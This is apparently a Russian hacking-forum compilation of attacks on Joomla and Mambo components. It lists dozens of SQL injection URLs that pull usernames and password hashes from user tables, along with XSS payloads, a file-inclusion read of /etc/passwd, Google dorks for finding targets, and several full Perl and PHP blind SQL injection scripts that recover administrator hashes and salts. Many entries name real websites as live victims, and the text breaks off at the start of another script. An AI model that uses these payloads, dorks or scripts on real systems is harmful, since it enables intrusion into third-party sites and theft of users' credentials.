Component PeopleBook 1.1.6 Passiv XSS

inurl: index.php?option=com_peoplebook
Инъекция: /index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
http://www.fln.org/index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
примечание: XSS'ка работает, только при условии если в компоненте включен поиск.

(c) it's my


Добавлено 08.02.2008
----------------------
А вот это не знаю, что такое, но точно Активная XSS
http://www.pan-group.com/mambo4.6/index.php?option=com_guest&option=com_guest&task=show&pageid=1

Еще Пасивная XSS в компоненте Quote:
http://www.hlconveyancing.com/index.php?option=com_quote&task=instructUs&Itemid=49
во всех полях вводим "><script>alert(document.coockie)</script>

Component com_noticias 1.0 SQL Injection

inurl: index.php?option=com_noticias
Инъекция: index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,passwor d),3,4,5+from+jos_users/*
http://www.cm-stirso.pt/index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,passwor d),3,4,5+from+jos_users/*
(c) zone-turk.net

SQL Injection

Mambo Component com_gallery Remote SQL Injection Vulnerability


EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*


EXPLOİT 2 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users



SQL Injection

Joomla Component NeoGallery 1.1 SQL Injection Vulnerability

EXPLOIT :

index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users

milw0rm.com

Mambo SQL Injection (com_comments)

index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1

http://www.milw0rm.com (http://www.milw0rm.com/exploits/5094)

Joomla Component rapidrecipe <= 1.6.5 SQL Injection

SQL Injection

after user_id or catogry_id add exploit

-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Для поиска:

allinurl: "com_rapidrecipe"user_id
allinurl: "com_rapidrecipe" category_id


Joomla Component pcchess <= 0.8 Remote SQL Injection

SQL Injection

index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Для поиска:

allinurl: com_pcchess "user_id"
allinurl: com_pcchess

(c) (http://www.hackturkiye.com)

Нашел сам, проверил - вроде не боян
Limbo - Lite Mambo 1.0.4
SQL инъекция в модуле downloads, в параметре catid, сайты тех поддержки уязвимы:
http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username, password),3+from+lc_users+--+
http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+

Component Blog Calendar 1.2.4 Passiv XSS

inurl: index.php?option=com_blog_calendar
Инъекция: index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.co ockie);%22%3E123%3C!--
http://courier.brestnet.com/index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.co ockie);%22%3E123%3C!--
Для того что бы выскочил алерт нужно навести курсор на бажную ссылку.

Component Board [версия неизвестна] Local Include

inurl: index.php?option=com_board
Инъекция: index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
По поводу компонента Board, не уверен правильно ли уязвимость назвал, но юзается на ура =)

(c) it's my

Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability

index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

(c)milw0rm.com

Joomla Component paxxgallery 0.2 (iid) SQL Injection

Exploit

AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)

EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOİT

EXPLOIT==

S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2 F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F %2A%2A%2Ffrom%2F%2A%2A%2Fjos_users

Для поиска

allinurl: com_paxxgallery "iid"
allinurl: com_paxxgallery "userid"


Joomla Component MCQuiz 0.9 Final (tid) SQL Injection

Exploit

ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),0x3a/**/from/**/jos_users/*

EXPLOİT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*

Для поиска

allinurl: com_mcquiz "tid"
allinurl: com_mcquiz


Joomla Component Quiz <= 0.81 (tid) SQL Injection

Exploit

ALL PASSWORD AND USERNAME UNDER PAGE

EXAMPLE: AFTER tid add EXPLOİTS

www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]

EXPLOIT=1=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/jos_users/*

EXPLOİT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*

Для поиска

allinurl: com_quiz"tid"
allinurl: com_quiz

(c) (http://www.hackturkiye.com)


Joomla Component mediaslide (albumnum) Blind SQL Injection

#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table = "jos_users";
$regex = "preview_f2";
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}

$i = 48;
$h = 1;
$f = 0;
$k = 0;
### Yeah,that's it... ###
while () {
while ($i <= 90) {

if(check($i,$h,1) == 1)
{
syswrite STDOUT,lc(chr($i));
$h++;
$a_chr = $a_chr.chr($i);
}

$i++;

}
push(@ffs,length($a_chr));
if (($#ffs -1) == $ffs) {
&check_vuln();
exit;
}
$i = 48;

}
#/

### :D ###
sub check($$$)
{
$i = shift;
$h = shift;
$m = shift;

switch ($m)
{
case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
}

$ua = LWP::UserAgent->new;
$url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
$response = $ua->get($url);
$content = $response->content;
if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/

sub check_vuln
{


$content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
$content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");

foreach $bb1 (split(/\n/,$content)) {
$bb = $bb.$bb1;
}

foreach $yy1 (split(/\n/,$content1)) {
$yy = $yy.$yy1;
}

$f = md5_hex($bb);
$s = md5_hex($yy);

if ($f eq $s) {
print "\nprobably not vulnerable"; #could be that ads,texts etc.. change
exit;
} else { print "\nvulnerable..."; }
}

# milw0rm.com [2008-02-14]

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

allinurl:"com_quran"
inurl:"/index.php?option=com_quran"

(c)milw0rm.com

Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability

EXPLOIT
index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1, 1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/

зы
allinurl: com_ricette
allinurl: "com_ricette"id

Auth S@BUN http://milw0rm.com/exploits/5133

joomla SQL Injection(com_jooget)


EXPLOIT :
index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 ,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

зы
allinurl: id "com_jooget"
allinurl: detail "com_jooget"
allinurl: "com_jooget"


Auth S@BUN http://milw0rm.com/exploits/5132

Component Portfolio 1.0 SQL Injection

inurl: index.php?option=com_portfolio
Инъекция: index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
(с) it's my http://milw0rm.com/exploits/5139

Joomla Component Artist

http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9+from+jos_users/*
Три разных уязвимых параметра

Joomla Component com_pccookbook (user_id) SQL Injection

SQL Injection

index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Для поиска

allinurl: com_pccookbook
allinurl: viewuserrecipes
allinurl: "com_pccookbook"user_id


Joomla Component com_clasifier (cat_id) SQL Injection

SQL Injection

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Для поиска

allinurl: com_clasifier
allinurl: com_clasifier cat_id

(c) (http://www.hackturkiye.com/)

Кoмпoнeнт соm_рhilаfоrm

уязвимый параметр fоrm_id

но работает не везде,в чем причина не разобрался

пример уязвимого сайта:

код:

httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5&fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36#&Itemid=5

Component EasyBook 1.1 Active XSS

inurl: index.php?option=com_easybook
Инъекция: При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение.
Пример: http://demo.easy-joomla.org/index.php?option=com_easybook&amp;Itemid=5
Никнейм Hi!, наводим курсор на ссылку

Component Simpleboard 1.0.3 (catid) SQL Injection

inurl: index.php?option=com_simpleboard
Инъекция: index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0 x3a,password),5+from+mos_users/*
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0 x3a,password),5+from+mos_users/*
(c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195

Mambo Component com_Musica (id) Remote SQL Injection Vulnerability

SQL Injection

index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*


milw0rm (http://milw0rm.com/)

Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability

SQL Injection


Joomla!


/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--


Mambo


/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--



milw0rm (milw0rm.com)

Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability

SQL Injection


index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*


milw0rm (milw0rm.com)

Joomla 1.5.1

Active XSS

Edit Your Details -> Your Name: [XSS]

XSS
(Права администратора)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter:[XSS]
/administrator/index.php?option=com_menus&task=view&menutype=[XSS]

ZAMUT (c)

Joomla components com_guide "category" Remote SQL Injection

PoC:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
password,3,4,5,6,7,8/**/from/**/jos_users/*


© The-0utl4w

Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability

SQL Injection

index.php?option=com_datsogallery&func=detail&id='Sql


union+select+1,2,3,4,concat_ws(0x3a,id,username,pa ssword),6,7,8,9,0,1,2,3,4,5+from+jos_users/*

milw0rm (http://milw0rm.com)

Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

SQL Injection

http://[target]/index.php?option=com_myalbum&album=[SQL]

-1+union+select+0,concat(username,char(32),password ),2,3,4%20from%20jos_users/*


Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability

SQL Injection


index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*


DORK:

inurl: "com_alphacontent"
"AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"


milw0rm (milw0rm.com)

Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability

Сайт разработчика : www.elearningforce.biz

Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код]



(с) NoGe

Joomla Пасивная XSS компонент Traxartist
Уязвимость:
index.php?option=com_traxartist&task=playSongex&id=1">[xss]
Пример:
http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script>

found by it's my

Joomla Component FlippingBook 1.0.4 SQL Injection

DORK: inurl:com_flippingbook
Exploit: /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*

(c)cO2
milw0rm.com (http://milw0rm.com)

Joomla Component Filiale v. 1.0.4 SQL Injection

DORK: inurl:com_filiale
Exploit: /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users

(c)Str0xo
milw0rm.com (http://milw0rm.com)

Joomla Component Profiler <= 1.0.1 Blind SQL Injection

DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

(c)$hur!k'n
milw0rm.com (http://milw0rm.com)

Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"
Vuln code:

.....
global $database;
$id = $_POST["id"];
$gid = $_POST["gid"];
if (isset($id)) {
.....


Exploit:

#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+-- \"more than 1 row\" --+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gid= --+-\n";
print "-+-- Dork: option=com_paxxgallery --+-\n";

# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34

print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;
my $i=1;
my $log= 1;
my ($content,$result) = undef;
my $request = 0;
while($log)
{
$content = get($ur1.'+and+1=(select+1+from+jos_users+where+le ngth(if(ascii(upper(substring((select+password+fro m+jos_users+where+id=62),'.$i.',1)))='.$n.',passwo rd,id))>4)/*'.$ur2);
if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}
elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}
else {$n++; if($n==58){$n=65} }
$request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;

Dork: option=com_paxxgallery


ZAMUT (c)

Joomla Component Webhosting (catid) Blind SQL Injection Exploit

Exploit:


#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_webhosting Blind SQL Injection"],
"version" => [],
"description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" => ["key=value"],
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_".index.php",
"port" => 80,
"method_a" => "SQL_INJECTION_BLIND",
"attack" =>
{
"option" => ["get","option","com_webhosting"],
"catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
"regex" => [[$non_find]],

},
},
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
$a_ = shift;
$id = shift;
$get_dA = get_d_p_s("get");
$post_dA = get_d_p_s("post");
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xds jaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options")
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}

foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}
if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}

}
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }
}

sub attack
{

if ($post_dA eq "") {
$method = "get";
} elsif ($post_dA ne "")
{
$method = "post";
}
if ($method eq "get") {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post")
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}
}
sub sql_injection_blind
{
syswrite STDOUT,$column.":";
while ()
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii);
}
$ii++;
}
push(@ffs,length($chr));
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48;
}
}
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post") ne "")
{
$method = "post";
} else { $method = "get";}
if ($method eq "get")
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post")
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
sub modify($$$)
{
$string = shift;
$replace_by = shift;
$replace_by1 = shift;
if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
}
}
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
{
$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{

$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get")
{

return $get_data;
}
elsif ($g_d_p_s eq "post")
{
return $post_data;
} elsif ($g_d_p_s eq "header")
{
return %header_dA;
}
}
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
return $req->content;
}
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}
}

# milw0rm.com [2008-05-01]


milw0rm (milw0rm.com)

Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit


<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms

//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';

//functions
function send_xpl($url, $xpl){
global $id;
$u=parse_url($url);
$req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="User-Agent: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
$res=fread($fs, 4096);
fclose($fs);
return $res;
}

function xpl($condition, $pos){
global $norm_ua;
global $where;
$xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
return $xpl;
}

//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);

//get md5
for($i=0;$i<=32;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=102;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}

//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);

//separator
$pass.=':';

//get salt
for($i=33;$i<=49;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=122;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=65;$j<=90;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
echo $pass;




Author : +toxa+

Joomla Component xsstream-dm 0.01 Beta SQL Injection

#!/usr/bin/perl -w

################################################## #######
